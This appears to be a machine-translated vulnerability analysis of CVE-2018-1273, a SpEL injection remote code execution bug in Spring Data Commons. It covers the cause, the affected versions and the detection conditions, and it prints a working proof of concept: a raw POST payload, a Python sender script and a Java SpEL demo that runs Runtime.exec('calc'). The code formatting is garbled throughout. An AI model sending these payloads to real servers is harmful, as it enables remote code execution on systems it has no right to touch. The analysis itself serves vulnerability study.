Shulou(Shulou.com)05/31 Report--

Spring-data-commons CVE-2018-1273 loophole analysis is how, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, I hope you can gain something.

Preface

CVE-2018-1273 is a vulnerability that can be executed remotely by Spring-data-commons recently. In order to understand more details, this paper will explain in detail from three aspects: the cause of the vulnerability, the determination of the vulnerability and the utilization of the vulnerability.

The cause of the loophole

When the user uses the relevant web features of Spring-data to automatically match the user's input parameters in the project, the key value of the form form submitted by the user will be used as the execution content of Spel, and this step is the flashpoint of this vulnerability.

Determination of loopholes

Verify that the target project contains the Spring-data-commons package and the version scope is as follows

Spring Data Commons 1.13 to 1.13.10Spring Data Commons 2.0 to 2.0.5

Check to see if the relevant features have been enabled

1.@EnableSpringDataWebSupport is displayed with a declaration

2.@EnableSpringDataWebSupport does not display a declaration, but uses the automatic scanning feature of the spring-boot framework. When using the automatic scanning feature of Spring-boot, the SpringDataWebConfiguration class will be automatically loaded at startup. The effect is the same as above.

3. In a non-annotated declaration project, the relevant features are also deemed to be enabled if there is the following declaration

Check the interface with @ RequestMapping. The parameter of the method is a custom interface (Interface).

The target code that meets the above conditions is as follows

@ SpringBootApplication public class App {public static void main (String [] args) {SpringApplication.run (App.class);} @ Controller public class TestController {@ RequestMapping ("test") public void CVEController (TestForm testForm) {System.out.println (testForm.getName ());}} interface TestForm {String getName ();}} exploit

Based on the loopholes identified above, we can construct the following attack code

1. Build a Post request for Http 2. Use form form submission to submit our key value3. Include the attack code 4. 4 in the name of key. The submitted key is the name5 of the getName () method above. Add a code snippet supported by Spel after name, and key will become something like name [T (java.lang.Runtime). GetRuntime (). Exec ("calc")]

The final playload is as follows

POST / test HTTP/1.1Host: 127.0.0.1:8080Content-Type: application/x-www-form-urlencodedCache-Control: no-cachename%5BT (java.lang.Runtime). GetRuntime () .exec (% 22calc%22)% 5D=v

The simple script written in python is as follows

Import http.client, urllib.parsecommand = "calc.exe" key = 'name [T (java.lang.Runtime). Exec ("% s")]'% commandparams = urllib.parse.urlencode ({key:'v'}) headers = {"Content-type": "application/x-www-form-urlencoded"} conn = http.client.HTTPConnection (host= "localhost", port=8080) conn.request ("POST", "/ test", params, headers) conn.close ()

All in all, when the vulnerability condition is met, only a specific key needs to be sent.

The process by which Spring-data-commons vulnerabilities are executed

The main cause of this vulnerability is that Spring uses SpelExpressionParser to parse propertyName when automatically parsing users' parameters.

Line 169of MapDataBinder.java

Expression expression = PARSER.parse_Expression (propertyName); PropertyPath leafProperty = getPropertyPath (propertyName). GetLeafProperty (); TypeInformation owningType = leafProperty.getOwningType (); TypeInformation propertyType = owningType.getProperty (leafProperty.getSegment ()); propertyType = propertyName.endsWith ("]")? PropertyType.getActualType (): propertyType; if (conversionRequired (value, propertyType.getType () {PropertyDescriptor descriptor = BeanUtils .getPropertyDescriptor (owningType.getType (), leafProperty.getSegment ()); MethodParameter methodParameter = new MethodParameter (descriptor.getReadMethod (),-1); TypeDescriptor typeDescriptor = TypeDescriptor.nested (methodParameter, 0); value = conversionService.convert (value, TypeDescriptor.forObject (value), typeDescriptor);} expression.setValue (context, value)

So how did this MapMapDataBinder be called? let's briefly talk about the part of SpringMVC in parsing parameters.

When the feature of the SpringDataWebConfiguration class is enabled, the ProxyingHandlerMethodArgumentResolver is registered with the container

When SpringMVC gets a request, it traverses the HandlerMethodArgumentResolver registered in the container to call their supportsParameter method. Since our parameter is an Interface (interface), ProxyingHandlerMethodArgumentResolver will tell the caller that it supports the parsing of this parameter, that is, supportsParameter will return true, but in practice, there will be many judgments, such as the interface cannot be under the java package, nor can it be under the org.springframework package.

When ProxyingHandlerMethodArgumentResolver gets the parameter, it creates a MapDataBinder to parse the parameter MapDataBinder.bind () method, performs doBind operations, and eventually calls the setPropertyValue method, and finally triggers the vulnerability when expression.setValue (context, value)

About the Spel of Spring

The full name of SPEL is Spring Expression Language, and brief translation is the expression language that comes with Spring. As shown in the code, Spring provides the following features

Public class SpelExample {public static void main (String [] args) {SpelExample spelExample=new SpelExample (); spelExample.supportValue (); spelExample.supportClassMethod (); spelExample.supportProperty (); spelExample.supportArray (); spelExample.supportCustomIndex (); spelExample.supportCustomProperty (); spelExample.runPlayLoad ();} / * * supports a value * * / public void supportValue () {SpelExpressionParser parser=new SpelExpressionParser (new SpelParserConfiguration (false, true)) Expression exp = parser.parse_Expression ("'this is a value'"); System.out.println (exp.getValue ()); / / this is a value} / * supports the execution of a java class method * / public void supportClassMethod () {SpelExpressionParser parser=new SpelExpressionParser (new SpelParserConfiguration (false, true)); Expression exp = parser.parse_Expression ("T (java.lang.Math). Random () * 100.0") System.out.println (exp.getValue ()); / / returns a random number} / * * supports assignment to the target object * * / public void supportProperty () {SpelExpressionParser parser=new SpelExpressionParser (new SpelParserConfiguration (false, true)); Expression exp = parser.parse_Expression ("name='set my value'"); MockClass mockClass=new MockClass (); exp.getValue (mockClass); System.out.println (mockClass.name) / / set my value} / * if the attribute is an array, * * / public void supportArray () {SpelExpressionParser parser=new SpelExpressionParser (new SpelParserConfiguration (false, true)); / / T (java.lang.Math.abs (0)) returns 0 Expression exp = parser.parse_Expression ("list [0] = 'list value'"); MockClass mockClass=new MockClass (); exp.getValue (mockClass) The subscript of the System.out.println (mockClass.list [0]); / / list value} / * array can also be expressed to obtain * comments: here is the key to malicious code execution * * / public void supportCustomIndex () {SpelExpressionParser parser=new SpelExpressionParser (new SpelParserConfiguration (false, true)) Expression exp = parser.parse_Expression ("list [T (java.lang.Math) .abs (0)] = 'index is 0'"); MockClass mockClass=new MockClass (); exp.getValue (mockClass); System.out.println (mockClass.list [0]) / / index is 0} / * * can also get the value of a specified subscript of an array attribute * this is where the above vulnerability is exploited * * / public void supportCustomProperty () {SpelExpressionParser parser=new SpelExpressionParser (new SpelParserConfiguration (false, true)); / / get the value Expression exp = parser.parse_Expression ("list [T (java.lang.Math) .abs (1)]") of subscript 1 in the list attribute of the target object. MockClass mockClass=new MockClass (); System.out.println (exp.getValue (mockClass)); / / output 1,} / * execute our code, pull up calculator * * / public void runPlayLoad () {SpelExpressionParser parser=new SpelExpressionParser (new SpelParserConfiguration (false, true)) / / get the value Expression exp = parser.parse_Expression ("list [[T (java.lang.Runtime). GetRuntime (). Exec (\" calc\ ")]] in the target object's list attribute; MockClass mockClass=new MockClass (); System.out.println (exp.getValue (mockClass)); / / output 1,} class MockClass {/ / can only be assigned public String name if it is declared as public Public String [] list=new String [] {"0", "1"};}} is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.